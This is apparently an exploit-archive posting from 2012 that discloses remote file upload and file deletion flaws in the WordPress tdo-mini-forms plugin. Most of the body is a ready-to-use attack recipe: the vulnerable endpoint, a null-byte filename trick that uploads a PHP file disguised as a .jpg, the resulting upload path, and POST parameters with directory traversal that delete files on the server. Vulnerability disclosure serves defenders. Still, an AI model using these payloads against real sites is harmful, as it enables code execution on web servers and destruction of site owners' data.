wordpress tdo-mini-forms plugin (rfu/rfd) Vulnerabilities

2012.11.21

Credit: Cold z3ro

Risk: High

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-98

wordpress tdo-mini-forms plugin (rfu/rfd) Vulnerabilities
 
------------------------------------------------------------
wordpress tdo-mini-forms plugin (remote file upload/remote file deletion) Vulnerabilities
Auther : Cold z3ro , www.hackteach.org , www.s3curi7y.com
Anonymous => You are the man 
 
 
# Remote file upload :
 
wordpress/wp-content/plugins/tdo-mini-forms/tdomf-upload-inline.php?tdomf_form_id=1&index=
 
file extension : file.php%00;.jpg
uploaded path :
wordpress/wp-content/uploads/tdomf/tmp/$tdomf_form_id(value)/$user_agent(IP)/$filename.PHP%00;.jpg
 
Example to uploaded path :
wordpress/wp-content/uploads/tdomf/tmp/1/127.0.0.1/z3ro.PHP%00;.jpg
 
 
 
# Remote file Deletion
 
=> Note : useing Any http POST header modifier .
 
tdomf_form_id = 1;
deletefile[]  = 1;
filepath      = $varibale ( wp-content/uploads/tdomf/tmp/1/127.0.0.1/z3ro.PHP%00;.jpg )
index         = NULL
 
Example to result : 
wp-content/plugins/tdo-mini-forms/tdomf-upload-inline.php?tdomf_form_id=1&deletefile[]=1&filepath=../../../wp-content/uploads/tdomf/tmp/1/127.0.0.1/z3ro.PHP%00;.jpg&index=
 
Eof; 

References:

http://www.hackteach.org

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

wordpress tdo-mini-forms plugin (rfu/rfd) Vulnerabilities

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.